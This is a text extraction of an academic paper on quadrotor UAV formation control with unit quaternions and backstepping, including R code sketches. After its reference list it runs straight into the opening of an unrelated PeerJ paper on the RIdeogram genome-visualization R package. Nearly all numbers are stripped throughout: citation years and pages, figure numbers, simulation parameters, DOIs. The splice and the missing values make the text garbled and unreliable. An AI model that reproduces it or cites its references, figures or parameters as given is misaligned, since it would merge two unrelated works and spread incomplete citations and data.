abstract—in this paper, the formation control problem of quadrotors is studied under ideal communication conditions. the quadrotor has a complex mathematical model. first, the unit-quaternion method is used to describe its dynamic and kinematic models, which are decomposed into two independent subsystems for position and attitude. the tracking error model is established by introducing the error between the true trajectory and the desired trajectory. a member of the formation is then appointed as the pilot, and the formation members obtain the geometric center position as the desired trajectory through a consistency algorithm. the backstepping method is used to design a time-varying feedback control law for each quadrotor so that the formation is stabilized. finally, the effectiveness of the control method is verified by simulation experiments.

keywords—formation control; quadrotor; quaternion; inversion method; leader-follower method

i. introduction
in recent years, with the rapid development of small unmanned aerial vehicles, researchers have paid increasing attention to the quadrotor because of its simple structure and ease of control. a quadrotor can not only take off vertically, land and hover autonomously, but can also carry out tasks efficiently in uncertain and dangerous environments.
however, faced with diverse combat missions, a single uav finds it increasingly difficult to meet operational needs, and the concept of multi-uav collaborative control has emerged in response. uav formation control is an important basic research track in the field of multi-uav collaborative control. a reasonable formation control method allows a uav formation to gain air superiority quickly and to finish combat tasks more efficiently; on the future battlefield, uavs will play an irreplaceable role. the main formation control methods include the leader-follower method, virtual structure, graph theory and behavior-based approaches [ ]; the current mainstream is the integration of these methods. early formation control mainly used centralized control, which is characterized by high precision and ease of control but depends on the computation and global communication capabilities of a central control unit. as the number of formation members increases, the computational load of the central control unit grows exponentially, so this method lacks scalability and flexibility. later, distributed control methods were proposed, in which each uav communicates only with adjacent uavs. the relative positions of the surrounding uavs are acquired and compared with the expected formation using each uav's own computing power, and the actual position of the uav is corrected to eliminate the formation error.

in recent years, many scholars have addressed the quadrotor formation problem and designed different types of controllers. in literature [ - ], controllers are designed by applying feedback linearization and small-perturbation linearization to quadrotor models simplified to different degrees. however, the quadrotor is a typical underactuated system, a cascaded nonholonomic system with complex constraint equations; it is strongly nonlinear and therefore places higher requirements on the control system. in literature [ ], the quadrotor is also modeled by unit quaternions, the concept of a manifold is introduced, and the attitude control algorithm is designed within a differential-geometry framework with good results. literature [ ] combines online neural-network identification of the nonlinear part of the system with the leader-follower method to realize quadrotor formation control. in literature [ ], the kinetic and kinematic models of the quadrotor are described by quaternions and an intermediate control is introduced; the formation is stabilized by setting an appropriate intermediate control for each uav. in literature [ ], the error between the actual position and the expected position is introduced and a tracking error model is established. literature [ ] also divides the quadrotor model into two independent subsystems for position and attitude, and each uses the backstepping method to design time-varying feedback that stabilizes the system. the backstepping method is a forward-and-backward recursive design method; it makes the system error asymptotically stable and reduces design difficulty by constructing the lyapunov function step by step. based on the above research, the quadrotor mathematical model is established here using the unit-quaternion method. the geometric center position of the formation is then calculated by a consistency algorithm and used as the expected trajectory.
finally, the whole formation is stabilized by designing a backstepping controller for each quadrotor.

ii. properties of the unit quaternion [ ]
a quaternion is a number of the form $a + b\mathbf{i} + c\mathbf{j} + d\mathbf{k}$, where $a, b, c, d$ are real numbers and $\mathbf{i}, \mathbf{j}, \mathbf{k}$ are imaginary units. the set of quaternions $h = \{a + b\mathbf{i} + c\mathbf{j} + d\mathbf{k} \mid a, b, c, d \in \mathbb{R}\}$ is a four-dimensional vector space over the real field $\mathbb{R}$. the scalar $\eta = a$ is the quaternion scalar part and $\tilde{q} = b\mathbf{i} + c\mathbf{j} + d\mathbf{k}$ is the quaternion vector part, so a quaternion can be written as
$$q = (\eta, \tilde{q}).$$
the norm of a unit quaternion is constant and equal to one, that is,
$$\|q\|^2 = \eta^2 + \tilde{q}^T\tilde{q} = 1,$$
so a unit quaternion can be seen as a point on the unit sphere $S^3$. the quaternion is a powerful tool for representing rotation in three-dimensional space. by euler's theorem, any rotation in three-dimensional space can be obtained by rotating through an angle $\gamma$ about a characteristic axis, and the corresponding unit quaternion is
$$q = \left(\cos\tfrac{\gamma}{2},\ \sin\tfrac{\gamma}{2}\,\hat{n}\right),$$
where $\hat{n}$ is the unit vector along that axis. given a unit quaternion, the relationship between the corresponding attitude matrix and the unit quaternion is
$$R(q) = (\eta^2 - \tilde{q}^T\tilde{q})\,I_3 + 2\tilde{q}\tilde{q}^T + 2\eta S(\tilde{q}),$$
where $I_3 \in \mathbb{R}^{3\times 3}$ is the identity matrix and $S(\cdot)$ is the skew-symmetric matrix operator defined in section iii. writing the euler angles as $(\phi, \theta, \psi)$ with the shorthand $c_x = \cos x$ and $s_x = \sin x$, the attitude matrix can be expressed as
$$R = \begin{bmatrix} c_\psi c_\theta & c_\psi s_\theta s_\phi - s_\psi c_\phi & c_\psi s_\theta c_\phi + s_\psi s_\phi \\ s_\psi c_\theta & s_\psi s_\theta s_\phi + c_\psi c_\phi & s_\psi s_\theta c_\phi - c_\psi s_\phi \\ -s_\theta & c_\theta s_\phi & c_\theta c_\phi \end{bmatrix}.$$
the error between the actual attitude matrix $R$ and the expected attitude matrix $R_d$ is defined as
$$\tilde{R} = R_d^T R.$$
let $q = (\eta_q, \tilde{q})$ and $p = (\eta_p, \tilde{p})$ be two unit quaternions. quaternion multiplication is defined as
$$q \odot p = \left(\eta_q\eta_p - \tilde{q}^T\tilde{p},\ \eta_q\tilde{p} + \eta_p\tilde{q} + S(\tilde{q})\tilde{p}\right).$$
quaternion multiplication does not satisfy the commutative law, $qp \neq pq$, but it satisfies the associative law, $(qp)s = q(ps)$, and the distributive law, $(p + q)s = ps + qs$. defining $q^{*} = (\eta, -\tilde{q})$ as the conjugate of the quaternion $q$, the conjugate of a product satisfies $(qp)^{*} = p^{*}q^{*}$.

iii. quadrotor model based on the unit quaternion
quadrotor uavs are usually built in the x or + configuration, with four inputs and six outputs, and are typical underactuated systems. the quadrotor performs its movements (pitch, roll and yaw) by controlling the speeds of four independent motors and propellers. the quaternion is a simple and effective mathematical tool for describing the rotation and motion of rigid bodies in three-dimensional space; it avoids singularities and is computationally efficient. the quadrotor uav is regarded as a rigid body. it is assumed that the center of gravity is located at the origin of the body coordinate system, that the motors have no installation error angle, and that the motor lift plane coincides with the plane containing the aircraft's center of mass.
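the quaternion algebra summarized in section ii is straightforward to prototype numerically. the sketch below is written in r purely for illustration (the authors' own simulations use matlab/simulink); it implements the quaternion product, the conjugate and the attitude matrix $R(q)$ under the sign conventions assumed above, with function names that are illustrative rather than taken from any published toolbox.

```r
# skew-symmetric matrix operator S(w), so that S(w) %*% v equals the cross product w x v
skew <- function(w) {
  matrix(c(    0, -w[3],  w[2],
            w[3],     0, -w[1],
           -w[2],  w[1],     0), nrow = 3, byrow = TRUE)
}

# quaternion stored as c(eta, q1, q2, q3): scalar part first, vector part last
quat_mult <- function(q, p) {
  eq <- q[1]; vq <- q[2:4]
  ep <- p[1]; vp <- p[2:4]
  c(eq * ep - sum(vq * vp),                               # scalar part
    eq * vp + ep * vq + as.vector(skew(vq) %*% vp))       # vector part
}

quat_conj <- function(q) c(q[1], -q[2:4])

# attitude matrix R(q) = (eta^2 - q~'q~) I + 2 q~ q~' + 2 eta S(q~)
quat_to_R <- function(q) {
  eta <- q[1]; v <- q[2:4]
  (eta^2 - sum(v * v)) * diag(3) + 2 * (v %o% v) + 2 * eta * skew(v)
}

# example: a rotation of pi/2 about the z-axis
gamma <- pi / 2
q <- c(cos(gamma / 2), sin(gamma / 2) * c(0, 0, 1))
round(quat_to_R(q), 6)        # the 90-degree yaw rotation matrix
quat_mult(q, quat_conj(q))    # q * q^* = (1, 0, 0, 0), the identity quaternion
```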
using the quaternion to establish the dynamic and kinematic models of the quadrotor, the vehicle is decomposed into a position subsystem $\Sigma_1$ and an attitude subsystem $\Sigma_2$, giving the following model:
$$\Sigma_1:\ \begin{cases}\dot{\xi} = v,\\ \dot{v} = g e_3 - \dfrac{T}{m} R e_3,\end{cases}\qquad \Sigma_2:\ \begin{cases}\dot{\eta} = -\tfrac{1}{2}\tilde{q}^T\omega,\\ \dot{\tilde{q}} = \tfrac{1}{2}\left(\eta I_3 + S(\tilde{q})\right)\omega,\\ J\dot{\omega} = -S(\omega)J\omega + \tau.\end{cases}$$
in this model, $\xi, v \in \mathbb{R}^3$ are the position and velocity of the quadrotor in the inertial coordinate system, $m$ and $g$ are the mass of the quadrotor and the gravitational acceleration, and $\omega = [\omega_1\ \omega_2\ \omega_3]^T \in \mathbb{R}^3$ is the angular velocity in the body coordinate system. the unit vector along the z-axis is $e_3 = [0\ 0\ 1]^T$, $T$ is the lift provided by the power system, and $\tau \in \mathbb{R}^3$ is the torque acting on the body, i.e., the rolling, pitching and yawing moments. $S(\omega)$ is the skew-symmetric matrix of $\omega$: for $\omega = [\omega_1\ \omega_2\ \omega_3]^T$,
$$S(\omega) = \begin{bmatrix} 0 & -\omega_3 & \omega_2 \\ \omega_3 & 0 & -\omega_1 \\ -\omega_2 & \omega_1 & 0 \end{bmatrix}.$$

iv. controller design and convergence analysis
a. problem description
consider a uav formation with $n$ members, each of which is assigned a number. it is assumed that each uav can access the state information of itself and of the other formation members through its own sensors and a wireless communication network. according to the information exchanged among the vehicles, the uav formation can be modeled, and the communication topology is assumed to be a connected graph, as shown in fig. . at the beginning of the formation flight, the members obtain their own state information and that of the other members through the wireless communication network; the desired formation center position and the expected speed are then obtained by the consistency algorithm and passed to the pose controller, making the uavs converge towards the scheduled formation center. once the specified spacing has been reached, the formation task is accomplished.

figure . schematic diagram of the quadrotor formation

disregarding differences between the quadrotors in the formation, each quadrotor is isomorphic and conforms to the model above:
$$\begin{cases}\dot{\xi}_i = v_i,\qquad \dot{v}_i = g e_3 - \dfrac{T_i}{m} R_i e_3,\\ \dot{\eta}_i = -\tfrac{1}{2}\tilde{q}_i^T\omega_i,\qquad \dot{\tilde{q}}_i = \tfrac{1}{2}\left(\eta_i I_3 + S(\tilde{q}_i)\right)\omega_i,\\ J\dot{\omega}_i = -S(\omega_i)J\omega_i + \tau_i.\end{cases}$$
define the position error of the $i$-th uav as $\tilde{\xi}_i = \xi_i - \xi_{id}$, the velocity error as $\tilde{v}_i = v_i - v_{id}$, and the angular velocity error as $\tilde{\omega} = \omega - \tilde{R}\omega_d$. differentiating these quantities, the error system model of the $i$-th uav is
$$\begin{cases}\dot{\tilde{\xi}}_i = \tilde{v}_i,\\ \dot{\tilde{v}}_i = g e_3 - \dfrac{T_{id}}{m} R_{id} e_3 - \dot{v}_{id} - \dfrac{1}{m}\left(T_i R_i e_3 - T_{id} R_{id} e_3\right),\\ \dot{\tilde{q}}_e = \tfrac{1}{2}\left(\tilde{\eta} I_3 + S(\tilde{q}_e)\right)\tilde{\omega},\\ J\dot{\tilde{\omega}} = -S(\omega)J\omega + \tau_i - J\left(\tilde{R}\dot{\omega}_d - S(\tilde{\omega})\tilde{R}\omega_d\right),\end{cases}$$
where $n_{id} = R_{id} e_3$ is the last column of the expected attitude matrix, and $T_{id}$ and $\tau_{id}$ are the control inputs of the system to be designed.
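to make the translational part of this model concrete, the sketch below performs one forward-euler integration step of the position subsystem for a single quadrotor. it is an illustrative r sketch: the mass, time step and thrust value are placeholder numbers rather than the parameters used in the paper, and quat_to_R() is the illustrative helper defined in the previous sketch.

```r
# one forward-euler step of the position subsystem:
#   xi_dot = v,  v_dot = g*e3 - (T/m) * R %*% e3
quad_translational_step <- function(xi, v, q, thrust, m = 1.0, g = 9.81, dt = 0.01) {
  e3 <- c(0, 0, 1)
  R  <- quat_to_R(q)                       # attitude matrix built from the quaternion
  v_dot <- g * e3 - (thrust / m) * as.vector(R %*% e3)
  list(xi = xi + dt * v,                   # integrate position
       v  = v  + dt * v_dot)               # integrate velocity
}

# hover check: with level attitude and thrust T = m*g the acceleration is ~0
state <- quad_translational_step(xi = c(0, 0, -1), v = c(0, 0, 0),
                                 q = c(1, 0, 0, 0), thrust = 1.0 * 9.81)
state$v    # approximately c(0, 0, 0)
```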
here $(\tilde{\eta}, \tilde{q}_e)$ is the error quaternion, and its calculation satisfies the quaternion multiplication algorithm:
$$(\tilde{\eta}, \tilde{q}_e) = q_d^{*} \odot q = \left(\eta_d\eta + \tilde{q}_d^T\tilde{q},\ \eta_d\tilde{q} - \eta\tilde{q}_d - S(\tilde{q}_d)\tilde{q}\right),$$
and $\tilde{R}$ is the attitude error matrix, obtained from the attitude-matrix formula of section ii as
$$\tilde{R} = (\tilde{\eta}^2 - \tilde{q}_e^T\tilde{q}_e)\,I_3 + 2\tilde{q}_e\tilde{q}_e^T + 2\tilde{\eta} S(\tilde{q}_e).$$
the work done in this paper is to design the virtual control input $T_i$ and the control torque $\tau_i$ for the $i$-th quadrotor so that the formation maintains a fixed shape and fixed inter-vehicle distances, that is,
$$v_i = v_j = v_d,\qquad \xi_i - \xi_j = \delta_{ij},$$
where $v_d$ is the expected reference speed of the formation and $\delta_{ij}$ is the desired displacement between the $i$-th and $j$-th uav, satisfying $\delta_{ij} = -\delta_{ji}$.

b. controller design
according to the cascade-system analysis method, the quadrotor error-system model is decomposed into a position error subsystem and an attitude error subsystem:
$$\tilde{\Sigma}_1:\ \begin{cases}\dot{\tilde{\xi}}_i = \tilde{v}_i,\\ \dot{\tilde{v}}_i = g e_3 - \dfrac{T_{id}}{m} n_{id} - \dot{v}_{id},\end{cases}\qquad \tilde{\Sigma}_2:\ \begin{cases}\dot{\tilde{q}}_e = \tfrac{1}{2}\left(\tilde{\eta} I_3 + S(\tilde{q}_e)\right)\tilde{\omega},\\ J\dot{\tilde{\omega}} = -S(\omega)J\omega + \tau_i - J\left(\tilde{R}\dot{\omega}_d - S(\tilde{\omega})\tilde{R}\omega_d\right).\end{cases}$$
following the cited literature, the backstepping method is used to design the position-subsystem controller and the attitude-subsystem controller separately. the first step is to define the error between the system state and the virtual feedback:
$$z_1 = \tilde{\xi}_i,\qquad z_2 = \tilde{v}_i - \alpha_1,$$
where $\alpha_1$ is the virtual control. a lyapunov function is defined for each virtual feedback so that each state component has appropriate asymptotic behaviour. this change of variables is essentially a differential homeomorphism: to stabilize the original system, it is only necessary to stabilize the error between the original system state and the virtual feedback.

step 1: differentiating $z_1$ gives $\dot{z}_1 = \tilde{v}_i = z_2 + \alpha_1$. define the first lyapunov function $V_1 = \tfrac{1}{2} z_1^T z_1$ and take $\alpha_1 = -k_1 z_1$ with $k_1 > 0$:
$$\dot{V}_1 = z_1^T\dot{z}_1 = z_1^T(z_2 + \alpha_1) = -k_1 z_1^T z_1 + z_1^T z_2.$$
obviously, if $z_2 = 0$, then $z_1$ is asymptotically stable by the above formula; but in general $z_2 \neq 0$, so it is necessary to proceed to the next step so that $z_2$ has the desired asymptotic characteristics.

step 2: define $V_2 = V_1 + \tfrac{1}{2} z_2^T z_2$. its time derivative is
$$\dot{V}_2 = -k_1 z_1^T z_1 + z_1^T z_2 + z_2^T\left(g e_3 - \frac{T_{id}}{m} n_{id} - \dot{v}_{id} + k_1\dot{z}_1\right).$$
taking
$$\frac{T_{id}}{m} n_{id} = g e_3 - \dot{v}_{id} + (k_1 + k_2)\tilde{v}_i + (1 + k_1 k_2)\tilde{\xi}_i,$$
we now have $\dot{V}_2 = -k_1 z_1^T z_1 - k_2 z_2^T z_2$ for positive numbers $k_1, k_2$. thus $z_1$ and $z_2$ converge exponentially to zero, and the position error subsystem is globally exponentially stable. according to the properties of the attitude matrix, $n_{id}$ is a unit vector, $\|n_{id}\| = 1$, so the expected lift $T_{id}$ and the virtual control direction $n_{id}$ of each member of the formation are obtained as
$$T_{id} = m\left\|g e_3 - \dot{v}_{id} + (k_1 + k_2)\tilde{v}_i + (1 + k_1 k_2)\tilde{\xi}_i\right\|,\qquad n_{id} = \frac{m}{T_{id}}\left(g e_3 - \dot{v}_{id} + (k_1 + k_2)\tilde{v}_i + (1 + k_1 k_2)\tilde{\xi}_i\right).$$
here $n_{id}$ satisfies the constraint $\|n_{id}\| = 1$; since $n_{id}$ does not contain all of the desired attitude information, the aircraft is required to maintain a heading angle of 0° during flight, that is, $\psi_{id} = 0$.
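a minimal numerical sketch of the position-subsystem law derived in this section is given below. it assumes the backstepping expression for $(T_{id}/m)\,n_{id}$ reconstructed above, uses placeholder gains and mass, and is only meant to show how the expected lift and the thrust direction are extracted from the tracking errors; it is an illustrative r sketch, not the authors' implementation.

```r
# position backstepping law (sketch):
#   (T_id / m) * n_id = g*e3 - a_id + (k1 + k2)*v_err + (1 + k1*k2)*xi_err
position_backstepping <- function(xi_err, v_err, a_id = c(0, 0, 0),
                                  k1 = 2, k2 = 4, m = 1.0, g = 9.81) {
  e3   <- c(0, 0, 1)
  vec  <- g * e3 - a_id + (k1 + k2) * v_err + (1 + k1 * k2) * xi_err
  T_id <- m * sqrt(sum(vec^2))        # expected lift (thrust magnitude)
  n_id <- m * vec / T_id              # unit thrust direction, last column of R_id
  list(T_id = T_id, n_id = n_id)
}

# example: hovering 0.5 m away from the desired point along x
position_backstepping(xi_err = c(0.5, 0, 0), v_err = c(0, 0, 0))
```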
$\phi_{id}$ and $\theta_{id}$ can then be obtained by calculation. the desired attitude matrix $R_{id}$ is obtained from the euler-angle expression of the attitude matrix in section ii, the desired quaternion $(\eta_{id}, \tilde{q}_{id})$ is obtained from the quaternion form of the attitude matrix, and the quaternion error $(\tilde{\eta}_i, \tilde{q}_{ie})$ is obtained through the quaternion multiplication algorithm. the same method is used to design a control law that makes the attitude subsystem globally exponentially stable, with the error between the system state and the virtual feedback defined as
$$z_3 = \tilde{q}_e,\qquad z_4 = \tilde{\omega} - \alpha_2,$$
where $\alpha_2$ is the virtual control amount. formation control is mainly concerned with the position control subsystem of the aircraft, so the inversion control law for the attitude subsystem of the $i$-th quadrotor is given directly, with the detailed derivation referred to the cited literature [ ]; it takes the form
$$\tau_i = S(\omega)J\omega + J\left(\tilde{R}\dot{\omega}_d - S(\tilde{\omega})\tilde{R}\omega_d\right) - k_3\tilde{\omega} - k_4\tilde{q}_e,$$
with positive gains $k_3$ and $k_4$.

the reference signal is negotiated by the formation members through the consistency algorithm and needs to satisfy certain constraints. assuming that the reference signals $\xi_{id}$, $v_{id}$, $\dot{v}_{id}$ and $\omega_{id}$ are bounded and visible to all formation members, the desired position $\xi_{id}$ and the desired velocity $v_{id}$ are obtained by taking the weighted average over all neighbouring members of the formation:
$$\xi_{id} = \frac{1}{n_i}\sum_{j \in N_i}\xi_j,\qquad v_{id} = \frac{1}{n_i}\sum_{j \in N_i} v_j,$$
which translates the formation problem into a trajectory tracking problem for a given reference signal. here $n_i$ is the number of aircraft in the formation that are neighbours of the $i$-th uav. considering the situation in which the formation communication topology is an undirected graph, every aircraft in the formation other than the pilot has the same status, so the subscript $i$ can be dropped and the formulas above are rewritten as
$$\xi_d = \frac{1}{n}\sum_{j}\xi_j,\qquad v_d = \frac{1}{n}\sum_{j} v_j.$$
the formation behaviour of the $i$-th uav can then be guaranteed through the inversion control law:
$$\xi_i - \xi_d = \delta_i,\qquad v_i = v_d,\qquad \xi_i - \xi_j = \delta_{ij},\qquad v_i = v_j.$$

v. experimental simulation
a. parameter setting
disregarding differences among the quadrotor systems, the quadrotor mass $m$ and the moments of inertia $J_x = J_y$ and $J_z$ are set to fixed nominal values, the formation size is set to $n = 5$, and the controller gains $k_1$ and $k_2$ are constant positive values. quadrotor number five is designated as the pilot and the remaining four are followers. it is assumed that the pilot broadcasts its own state information, that the followers can receive it in real time, and that the communication topology between the followers is an undirected graph. the follower initial position matrix is $P$. the pilot performs uniform circular motion at a fixed height, with trajectory
$$x = \cos t,\qquad y = \sin t,\qquad z = \text{const}.$$
the relative positional deviation of the formation is described by the offset matrix $\delta$. the simulation runs for a fixed time with a fixed step size.

b. simulation results
according to the above parameters, the system model is built with the simulink module in matlab, and the control algorithm is verified. figure  shows the three-dimensional map of the formation simulation.
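the reference-generation step used in the simulation, in which each follower averages its neighbours' positions and velocities while the pilot flies a circle at fixed height, is simple enough to sketch directly. the snippet below is an illustrative r sketch with made-up neighbour states and an assumed radius and height for the pilot's circle; it is not the authors' matlab/simulink code.

```r
# desired reference for uav i: the average position/velocity of its neighbours
consensus_reference <- function(neighbor_pos, neighbor_vel) {
  list(xi_d = colMeans(neighbor_pos),   # xi_d = (1/n_i) * sum_j xi_j
       v_d  = colMeans(neighbor_vel))   # v_d  = (1/n_i) * sum_j v_j
}

# illustrative pilot trajectory: uniform circular motion at a fixed height
pilot_state <- function(t, radius = 5, height = 10) {
  list(pos = c(radius * cos(t), radius * sin(t), height),
       vel = c(-radius * sin(t), radius * cos(t), 0))
}

# example with three (made-up) neighbours, one of them the pilot at t = 0
p <- pilot_state(0)
neigh_pos <- rbind(p$pos, c(1, -2, 9.5), c(-1.5, 0.5, 10.2))
neigh_vel <- rbind(p$vel, c(0, 4.8, 0),  c(0.2, 5.1, 0))
consensus_reference(neigh_pos, neigh_vel)
```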
in the formation track plot of fig. , the black curve is the trajectory of the pilot and the triangles "△" indicate the final position of each quadrotor uav. at the beginning of the simulation, the pilot performs circular motion in the air while the followers are located at different positions on the ground; they take off after receiving the state information of the pilot, the team members calculate the formation center position through negotiation and use it as the reference tracking signal, and the control algorithm eventually converges the five quadrotors to the intended formation. a variety of formations can easily be designed by setting different relative position errors. figures  to  show the change of the position and velocity of the fleet members during the formation and maneuvering process. it can be seen from the figures that the followers quickly move closer to the pilot after takeoff; at t =  s the distance from the pilot settles at the designated value, the followers keep the same speed as the pilot, and the pilot is tracked well. the validity of the tactics proposed in this paper is thus verified.

figure . quadrotor formation track simulation curve
figure . x-direction uav position and speed curve
figure . y-direction uav position and speed curve
figure . z-direction uav position and speed curve

figure  shows the error between the pilot's trajectory and the formation center trajectory calculated by the formation members' negotiation. it can be seen that the formation center finally converges to the position of the pilot.

figure . reference trajectory and pilot trajectory error

vi. conclusion
aiming at the control problem of quadrotor formations, the nonlinear dynamic and kinematic models are described by unit quaternions, and formation control is achieved by tracking the geometric center of the formation. at the beginning of the formation flight, the team members exchange position, speed and other state information through the wireless network and calculate the geometric center of the formation as a reference signal. a time-varying feedback control law is designed for each uav through the backstepping method, which translates the formation problem into a tracking problem for a given reference signal. the matlab simulation results show that the method is fast and accurate and that the convergence speed of the formation system is improved. at present, the method does not consider formation keeping under a maximum-velocity constraint; subsequent studies will consider the generation, maintenance and reconstruction of the formation under consistency and maximum-speed constraints.

acknowledgment
fund support: shaanxi education department special fund, project number: shaanxi education finance[ ].

references
[ ] survey of developments on multi-agent formation control related problems[j]. control and decision, , ( ): - .
[ ] f. rinaldi, s. chiesa, f. quagliotti. linear quadratic control for quadrotors uavs dynamics and formation flight[j]. intell robot syst, ( ): - .
[ ] xia liang-sheng. formation control for multi-robot based on flocking[j]. fire control & command control, , ( ): - .
[ ] yu b c, dong x w, shi z y, et al. formation control for quadrotor swarm systems: algorithms and experiments[a].
proceedings of the nd chinese control conference[c]. - , july , xi’an china. [ ] wang honghao, chen ming etc. attitude estimation of quadrotor based on quaternion and kalman filtering [j]. microcomputer and application, , ( ): - . [ ] xing guan-sheng, du chun-yan et al. consensus-based distributed motion planning for autonomous formation of miniature quadrotor groups[j]. control and decision, , ( ): - . [ ] fu changyou, cai hongbin etc. design of micro quad-rotor aircraft based on iot[]. modern electronic technique, , ( ): - . [ ] choi insung, choi jongsuk. leader-follower formation control using pid controller[a]. th international conference [c]. - , october, , montreal, canada. [ ] wu cheng-fu, liu xiao-qi etc. modeling and control for a quadrotor uav based on quaternion[j]. flight dynamics, , ( ): - . [ ] dierks t, jagannathan s. neural network control of quadrotor uav formations [a]. american control conference [c]. st.louis, usa, . [ ] abdessameud a, tayebi a. formation control of vtol-uavs [a]. joint th ieee conference on decision and control and th chinese control conference [c]. . [ ] li guang-chun, wang lu, wang zhao-long et al. trajectory tracking control of quad-rotor uav based on quaternion[j]. journal of applied sciences, , ( ): - . submitted august accepted december published january corresponding authors guangchuang yu, gcyu @smu.edu.cn jinhui chen, chenjh@njfu.edu.cn academic editor sebastian ventura additional information and declarations can be found on page doi . /peerj-cs. copyright hao et al. distributed under creative commons cc-by . open access rideogram: drawing svg graphics to visualize and map genome-wide data on the idiograms zhaodong hao , , dekang lv , ying ge , jisen shi , dolf weijers , guangchuang yu and jinhui chen key laboratory of forest genetics & biotechnology of ministry of education, co-innovation center for sustainable forestry in southern china, nanjing forestry university, nanjing, jiangsu, china laboratory of biochemistry, wageningen university, wageningen, haarlem, netherlands institute of cancer stem cell, dalian medical university, dalian, liaoning, china institute of bioinformatics, school of basic medical sciences, southern medical university, guangzhou, guangdong, china abstract background. owing to the rapid advances in dna sequencing technologies, whole genome from more and more species are becoming available at increasing pace. for whole-genome analysis, idiograms provide a very popular, intuitive and effective way to map and visualize the genome-wide information, such as gc content, gene and repeat density, dna methylation distribution, genomic synteny, etc. however, most available software programs and web servers are available only for a few model species, such as human, mouse and fly, or have limited application scenarios. as more and more non-model species are sequenced with chromosome-level assembly being available, tools that can generate idiograms for a broad range of species and be capable of visualizing more data types are needed to help better understanding fundamental genome characteristics. results. the r package rideogram allows users to build high-quality idiograms of any species of interest. it can map continuous and discrete genome-wide data on the idiograms and visualize them in a heat map and track labels, respectively. conclusion. 
the visualization of genome-wide data mapping and comparison allow users to quickly establish a clear impression of the chromosomal distribution pattern, thus making rideogram a useful tool for any researchers working with omics. subjects bioinformatics, data science, graphics, visual analytics keywords genome, chromosome, idiogram, r package, data visualization introduction recently, with the development of sequencing technologies, especially rapid advances in third generation sequencing including pacific biosciences (eid et al., ) and oxford nanopore technologies (laver et al., ), bionano genome mapping (cao et al., ) and high-throughput chromatin conformation capture sequencing (dekker et al., ), more and more species have their genomes sequenced or updated to the chromosome level (jiao & schneeberger, ; phillippy, ). after the chromosome-level genome completion, an overview of some genome characteristics can help to better understand a how to cite this article hao z, lv d, ge y, shi j, weijers d, yu g, chen j. . rideogram: drawing svg graphics to visualize and map genome-wide data on the idiograms. peerj comput. sci. :e http://doi.org/ . /peerj-cs. https://peerj.com/computer-science mailto:gcyu @smu.edu.cn mailto:chenjh@njfu.edu.cn https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://creativecommons.org/licenses/by/ . / http://creativecommons.org/licenses/by/ . / http://doi.org/ . /peerj-cs. species genome, such as gene and transposon distribution across the sunflower genome (badouin et al., ). an idiogram, also known as a karyotype, is defined as the phenotypic appearance of chromosomes in the nucleus of an eukaryotic cell and has been widely used to visualize the genome-wide data since the first web server, idiographica, came online in (kin & ono, ). there are dozens of tools have been developed for circular genome visualization with a perl language-based tool circos being the most used one (krzywinski et al., ; parveen, khurana & kumar, ). in contrast, there are not many alternatives for non- circular plots of whole genome information on idiograms. although few r packages, like genomegraphs (durinck et al., ), ggbio (yin, cook & lawrence, ), ideoviz (pai & ren, ), chromplot (orostica & verdugo, ) and chromdraw (janecka & lysak, ), and javascript libraries, like ideogram.js (weitz et al., ) and karyotypesvg (prlic, ), have been developed for non-circular genome visualization, they are either limited in several species and data visualization types or lacking the ample customization. recently, two r packages, karyoploter (gel & serra, ) and chromomap (anand, ), with strengthened capacities have been developed. however, one function that all these non-circular plots fail to achieve, as circos does, is to visualize the relationship between two or more species using bezier curves on idiograms. this function is very useful and allows to interpret genome-wide relationships more intuitively, especially in the visualization of whole genome duplication. indeed, circos is usually used to show syntenic blocks both in inter- and intraspecies genome comparisons using bezier curves (hu et al., ; wang et al., ). thus, there is a lack of a r package for non-circular genome visualization and allowing to visualize genome-wide relationships between two or more species using bezier curves on idiograms. scalable vector graphics (svg) is a language for describing two-dimensional graphics applications and images. 
svg graphics is defined in an extensible markup language (xml) text file which means that one can easily use any text editor or drawing software to create and edit svg graphics. most r graphics packages are built on two graphics systems, the traditional graphics system and the grid graphics system. here, we developed an r package (rideogram) to draw high-quality idiograms without species limitations, that allows to visualize and map whole-genome information on the idiograms based on the svg language. besides, rideogram can also be used to show the genome synteny with bezier curves linking the syntenic blocks on idiograms. description the package rideogram is written in r (r core team, ), one of the most popular programming languages widely used in statistical computing, data analytics and graphics. however, this new r graphics package is not built based on any existing graphics systems. we use the r environment to read the custom input files and calculate the drawing element positions in a coordinate system. then, we use r to write all element information into a text file following the xml format which are used to define graphics by the svg language. a list of the currently implemented commands is given in table . in general, there are three hao et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table functions contained in the package rideogram. function name description gffex extract information from a gff format genome annotation fill ideogram map and visualize the genome-wide data on the idiograms convertsvg convert the output file from the svg format to the format users chose svg tiff convert the output file from the svg format to the tiff format svg pdf convert the output file from the svg format to the pdf format svg jpg convert the output file from the svg format to the jpg format svg png convert the output file from the svg format to the png format main functions, gffex, ideogram and convertsvg implemented in the package rideogram. users can use the function data to load the example data or the basic r function read.table to load the custom data from local files. the function gffex can be used to extract the information from a gff format genome annotation file. then, the function ideogram can be used to compute the information for all drawing elements based on the input files and generate a a -sized svg file containing a vector graphic which can be conveniently viewed and modified using the software adobe illustrator or inkscape. alternatively, users can also use the function convertsvg to convert this svg file into an adjustable image format (pdf, png, tiff, or jpg) with a user-defined resolution according to the practical requirements. in general, there are two types of data, i.e., continuous and discrete data. for mapping and visualizing, rideogram considers the continuous data, such as gene density across the whole genome in -mb windows, as overlaid features and maps them on the idiograms with dark/light colors representing high/low values. for the other data type that are scattered throughout the whole genome, such as the chromosomal distribution of members in one gene family, rideogram can add track labels next to the idiograms with three shapes (box, circle and triangle) available to represent different characteristics of these members, such as the subclade that one gene member belongs to. users can also combine the shapes and colors to represent more than three distinct characteristic types. 
